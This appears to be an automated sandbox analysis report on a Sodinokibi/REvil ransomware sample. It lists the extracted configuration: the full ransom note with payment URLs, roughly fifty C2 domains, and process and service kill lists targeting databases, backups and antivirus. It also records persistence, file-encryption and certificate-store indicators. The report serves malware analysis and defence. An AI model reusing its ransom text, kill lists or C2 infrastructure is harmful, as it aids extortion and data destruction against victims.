Overview

overview

10

Static

static

10

cb6db23d41d26f...de.exe

windows7_x64

10

cb6db23d41d26f...de.exe

windows10_x64

10
General
Target

cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

Filesize

207KB

Completed

24-01-2022 01:18

Task

behavioral2

Score
10/10
MD5

98563381bf9dff3b3e987e969b31ce33

SHA1

bdf6b213a792dbcb74ccf4a3c86fa565f248505f

SHA256

cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde

SHA256

5b50e1162acccc13b7e4af06dae5df1ef0b1a2c136e5105bd32188752da566a0434fb532321a5a02ba5e8beab2edbf7e9e13676994d1c2f8940eeb0f674977e9

Malware Config

Extracted

Path

C:\vlnniw6-readme.txt
Family

sodinokibi
Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension vlnniw6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C90C7DE37D5511D0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C90C7DE37D5511D0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: c0hvBz9QNLGuvZM8xvP9Lo/sOVZ1vkb3nPfbaGafxyTPIg/elQTcCLscNcDj/SoT d2fjwj9uQZafAvLR1c3pa5ZkNvOKZshaNgrfvtpAfiZ2zhcQF7e1ColNjEd/6nfU oI9yLKO859oTM5b4H/B0VhOD5n7mau0DaG6b8rvVdaV7CZ9q9CJylntSjLOCGuCD JLzcGEdvUoc+ulPtMTgLYQFjSHobr9r4/x3yMzGTh45vA4wNn4Umoq1Tlb5HK2c1 PNa3JCoSfLFMx1+MdK7djMUQmq63xO6hDAM+RaH3KGxZrcK5hOPXI6d7YXi/h+Tz brkNfJIUKSwItz4O5KDQ1PwVnVxIRESJCwNWJJqD72zr+wISIMp8lktvV4w1dXPc tDfOGhBjrRyfIzazAXvlIX90dOfu7eqNhAtgfXU4htVN7eicj9og+/yvvTrRd0Bi 0ht1Ar0axPt0WMxdI7VeqOWr/Sw127/kcw7Pizc0ygelUpveT7LAWegEQ/8InZhs XSs0PlPyFAgNpiuzmveSKCkAWvK317pyEFpm3o1H8q+5I8s7L45oBJMWXQAkvO1i 7gSDPBxcilSTZQjwc+08Q+4MVNSSbE93Vvv33dTt1ikdEOL0TCxNLuBu2EoNn2va iyL2WOlSBtZiklMzELzA+Z67c7Hg6IanAH6E3n+uny2nUBlzekGfpP/7IbisQ/Fv uG1MfHD8QLtUXI/g8rIsH1QahztoUugOjP4+Lr+iEc8JHKJqx+TFIxMEHNnutUOk 8GOV2W7JUY89grFFSKlG0MthTIPTHjqp0kbI2F8/v4TTesC+mO6t6iRb8nqr0vmU NYich5EkTd9XrdrY+Qz3xMaHpUB7/5z3DUXPf+zi89kcChYCNsw4unXgQr2g7v1L +E2LdhkWozwclzq0RnPDgrpHKZ6Z3RQA5ZaJ58P0bml562UIKBqrXSuulbMCAdTJ PhLZ3x5nNPjD+law/EG1QwR4T6UOu+FWuAl5GStwoG+zBrvf7ngp7iul8KMW0kFP gxBYkc6DEdyUeqkEr1HHVlohch4M7FeSzDKAwIbHWMl2KkVRzwt98e6G40P033AN J5Yo861Ska3JipX5iZHJrusBgVmoAPW1daWFoz3lAKLKZYGb9SWlRR7Su3F/ZhJO JnZjck3mrDHDIJPU5pMjBysI2y+yFq3YxsAW/BWK9+lLsWxQVTm84d+hKE7Uzn2A wXmmfGskRLqwJiU4C9aptAWEhf3K/OLHody29MtXIX/jUYd4wUWkKUYG+J5YRGo0 ZYh12ALdRjMtPkGX/OpPiRjC ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C90C7DE37D5511D0

http://decryptor.cc/C90C7DE37D5511D0

Extracted

Family

sodinokibi
Botnet

$2a$10$bYPwfV5f.unsW7RpjYqD/u290WiTDfoU8OCGlN3G.nU1ZtWwaUIdm
Campaign

3253
C2

pier40forall.org

sandd.nl

thaysa.com

completeweddingkansas.com

gaiam.nl

dpo-as-a-service.com

aarvorg.com

personalenhancementcenter.com

cheminpsy.fr

pinkexcel.com

rimborsobancario.net

deepsouthclothingcompany.com

ligiercenter-sachsen.de

webhostingsrbija.rs

marcuswhitten.site

asteriag.com

edv-live.de

levdittliv.se

vickiegrayimages.com

iwr.nl

sobreholanda.com

launchhubl.com

naswrrg.org

123vrachi.ru

dirittosanitario.biz

polymedia.dk

tennisclubetten.nl

liveottelut.com

scenepublique.net

wraithco.com

analiticapublica.es

tstaffing.nl

milanonotai.it

galserwis.pl

crosspointefellowship.church

onlybacklink.com

klusbeter.nl

despedidascostablanca.es

memaag.com

symphonyenvironmental.com

oneplusresource.org

mirjamholleman.nl

roygolden.com

kampotpepper.gives

pubweb.carnet.hr

lapmangfpt.info.vn

insigniapmg.com

colorofhorses.com

dekkinngay.com

div-vertriebsforschung.de
Attributes
net
true
pid
$2a$10$bYPwfV5f.unsW7RpjYqD/u290WiTDfoU8OCGlN3G.nU1ZtWwaUIdm
prc
sql
firefox
visio
mspub
xfssvccon
msaccess
oracle
ocautoupds
tbirdconfig
infopath
ocssd
excel
thebat
winword
wordpad
steam
isqlplussvc
dbeng50
outlook
thunderbird
dbsnmp
mydesktopqos
mydesktopservice
synctime
sqbcoreservice
ocomm
onenote
powerpnt
agntsvc
encsvc
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
sub
3253
svc
memtas
mepocs
svc$
veeam
sophos
sql
vss
backup
Signatures 17

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Impact
Persistence
  • Modifies system executable filetype association
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Tags

    TTPs

    Modify RegistryChange Default File Association

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Neshta

    Description

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    Tags

  • Sodin,Sodinokibi,REvil

    Description

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    Tags

  • Executes dropped EXE
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Reported IOCs

    pidprocess
    1988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Modifies extensions of user files
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File opened for modification\??\c:\users\admin\pictures\OpenRedo.tiffcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\ImportRevoke.tif => \??\c:\users\admin\pictures\ImportRevoke.tif.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\OpenRedo.tiff => \??\c:\users\admin\pictures\OpenRedo.tiff.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\StartInstall.tif => \??\c:\users\admin\pictures\StartInstall.tif.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\WriteRename.crw => \??\c:\users\admin\pictures\WriteRename.crw.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\users\admin\pictures\RegisterConfirm.tiffcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\users\admin\pictures\ResetOptimize.tiffcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\HideRename.raw => \??\c:\users\admin\pictures\HideRename.raw.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\RegisterConfirm.tiff => \??\c:\users\admin\pictures\RegisterConfirm.tiff.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File renamedC:\Users\Admin\Pictures\ResetOptimize.tiff => \??\c:\users\admin\pictures\ResetOptimize.tiff.vlnniw6cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Tags

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Runcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\k51299BQXH = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe"cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Enumerates connected drives
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)\??\F:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\K:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\X:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\A:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\H:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\I:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\J:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\P:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\S:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\V:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\G:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\L:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\O:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\T:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\U:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\Z:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\D:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\E:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\M:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\N:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\Q:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\R:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\W:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\Y:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened (read-only)\??\B:cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Sets desktop wallpaper using registry
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Tags

    TTPs

    DefacementModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7v2ua9k3l2.bmp"cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Drops file in Program Files directory
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\PROGRA~2\INTERN~1\ieinstal.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\UnblockSubmit.potxcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmplayer.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\CompressSet.svgcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\OpenConvertFrom.3gp2cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\StartPop.phpcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpconfig.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\SaveRestart.wmvcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ielowutil.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\wab.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File created\??\c:\program files\vlnniw6-readme.txtcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\UnregisterConvertTo.001cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\setup_wm.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmlaunch.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\GrantSync.vssxcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\UndoPing.pdfcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\UnlockComplete.au3cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\wabmig.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\StepPublish.rlecb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\CompareComplete.M2TScb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI8A19~1\ImagingDevices.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\ReadCopy.eprtxcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\RestartTest.mppcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\UNINST~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\DenyGet.midcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmprph.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\ReceiveJoin.otfcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\UnlockEdit.regcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ExtExport.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modification\??\c:\program files\NewApprove.rtfcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpshare.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File opened for modificationC:\PROGRA~2\Google\Update\DISABL~1.EXEcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    File created\??\c:\program files (x86)\vlnniw6-readme.txtcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Drops file in Windows directory
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\svchost.comcb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Modifies system certificate store
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Tags

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f